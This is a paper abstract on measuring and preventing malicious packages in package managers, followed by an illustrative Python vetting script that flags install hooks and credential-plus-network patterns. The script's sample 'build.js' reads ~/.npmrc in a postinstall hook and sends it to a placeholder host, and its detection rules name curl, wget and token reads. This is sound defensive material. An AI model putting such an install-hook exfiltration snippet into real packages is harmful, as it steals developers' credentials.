Measuring and Preventing Supply Chain Attacks on Package Managers

Package managers have become a vital part of the modern software development process. They allow developers to reuse third-party code, share their own code, minimize their codebase, and simplify the build process. However, recent reports showed that hundreds of malicious packages have made their way into package managers and have been downloaded millions of times, posing significant security risks to developers as well as end-users. For example, eslint-scope, a package with millions of weekly downloads on npm, was compromised to steal credentials from developers. To understand the attacks on package managers and the misplaced trust that makes them possible, we propose a comparative framework to study the package managers for interpreted languages. By systematically analyzing the recent attacks using our framework, we can identify security gaps and broken trust in the package manager ecosystem. Based on these insights, we propose and implement a vetting pipeline, MalOSS, to perform metadata, static and dynamic analysis on packages and flag the suspicious ones. Through iterative labeling, we identified and reported 339 malicious packages to package manager maintainers. 278 (82 percent) of them have been confirmed and removed, and 3 of them with more than 100,000 downloads have been assigned CVEs. To help secure the ecosystem, we propose actionable security improvements for package manager maintainers and suggestions for other stakeholders.
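As an added illustration of the metadata and static stages of such a vetting pipeline (this is example code, not the paper's MalOSS implementation), the following flags install-time lifecycle hooks in an npm manifest and source files that both read credential material and open a network connection. The heuristics, the sample manifest and the sample source are all constructed here and are assumptions, not values from the paper.

```python
import json
import re

# Lifecycle hooks npm runs automatically at install time (metadata stage).
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
# Constructed heuristics for hook commands that warrant a closer look.
HOOK_PATTERNS = [r"\bcurl\b", r"\bwget\b", r"\bnode\s+-e\b", r"\beval\b"]
# Constructed source-level indicators (static stage).
SOURCE_SINKS = {
    "network": re.compile(r"require\(['\"]https?['\"]\)|\bfetch\("),
    "credentials": re.compile(r"\.npmrc|process\.env\.[A-Z_]*(?:TOKEN|KEY|SECRET)"),
    "eval": re.compile(r"\beval\(|new Function\("),
}

def vet_manifest(manifest: dict) -> list:
    """Metadata check: report install hooks and suspicious hook commands."""
    findings = []
    scripts = manifest.get("scripts", {})
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        findings.append(f"install hook '{hook}' runs: {cmd}")
        findings += [f"install hook '{hook}' matches {p}" for p in HOOK_PATTERNS if re.search(p, cmd)]
    return findings

def vet_source(src: str) -> list:
    """Static check: flag indicators and the credentials+network combination."""
    hits = {name: bool(rx.search(src)) for name, rx in SOURCE_SINKS.items()}
    findings = [f"source uses {name}" for name, hit in hits.items() if hit]
    if hits["network"] and hits["credentials"]:
        findings.append("source reads credentials and has network access: possible exfiltration")
    return findings

def vet_package(manifest: dict, sources: dict) -> dict:
    """Combine both stages into one verdict for a package."""
    findings = vet_manifest(manifest)
    for path, src in sources.items():
        findings += [f"{path}: {f}" for f in vet_source(src)]
    return {"name": manifest.get("name"), "suspicious": bool(findings), "findings": findings}

# Constructed sample package (hypothetical, modelled on an install-hook credential theft).
SAMPLE_MANIFEST = json.loads('{"name": "example-pkg", "version": "1.0.0",'
                            ' "scripts": {"postinstall": "node build.js"}}')
SAMPLE_SOURCES = {"build.js": (
    "const https = require('https');\nconst fs = require('fs');\n"
    "const cfg = fs.readFileSync(process.env.HOME + '/.npmrc', 'utf8');\n"
    "https.get('https://example.invalid/?c=' + encodeURIComponent(cfg));\n")}

if __name__ == "__main__":
    print(json.dumps(vet_package(SAMPLE_MANIFEST, SAMPLE_SOURCES), indent=2))
```

Real pipelines add a dynamic stage (running the install in a sandbox and tracing syscalls and network activity), which catches obfuscated code these regexes miss.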
